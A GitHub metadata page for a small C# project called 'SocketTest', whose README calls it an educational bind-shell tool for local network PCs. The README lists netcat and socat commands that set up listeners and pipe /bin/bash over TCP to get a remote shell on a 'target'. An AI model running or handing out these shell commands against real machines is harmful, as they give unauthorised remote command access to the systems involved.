https://github.com/ezroot/sockettest
messing with sockets/tcp
https://github.com/ezroot/sockettest
Last synced: about 2 months ago
JSON representation
messing with sockets/tcp
- Host: GitHub
- URL: https://github.com/ezroot/sockettest
- Owner: EZroot
- Created: 2021-08-11T15:16:09.000Z (almost 5 years ago)
- Default Branch: master
- Last Pushed: 2021-08-12T00:53:19.000Z (almost 5 years ago)
- Last Synced: 2025-03-11T10:24:38.981Z (over 1 year ago)
- Language: C#
- Size: 80.1 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SocketTest
Connecting to local pcs on a network.
For educational purposes.
# Start a server
nc -nlvp 1337 (for our custom bind shell)
# Start our client connection from target
./SocketTest -> Netcat Bind Shell
# Start a socat server (easier to upgrade to full reverse shell)
socat -d -d TCP4-LISTEN:9001 STDOUT
# Send this using our netcat bind
socat TCP4:127.0.0.1:9001 EXEC:/bin/bash